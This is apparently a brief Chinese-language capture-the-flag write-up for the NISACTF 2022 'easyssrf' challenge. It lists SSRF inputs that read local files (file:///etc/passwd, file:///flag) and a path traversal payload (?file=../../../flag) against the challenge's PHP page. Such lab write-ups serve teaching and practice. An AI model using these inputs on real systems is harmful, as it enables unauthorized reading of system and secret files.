[NISACTF 2022]easyssrf
目录
[NISACTF 2022]easyssrf
题目已经告知利用 SSRF 漏洞,输入 file:///etc/passwd ,失败,提示换个路径
输入 file:///flag ,得到提示 fl4g
输入 file:///fl4g ,得到提示 ha1x1ux1u.php
访问 ha1x1ux1u.php
|
|
payload:?file=../../../flag
无基础可看:SSRF漏洞原理攻击与防御(超详细总结)
欲将心事付瑶琴。知音少,弦断有谁听?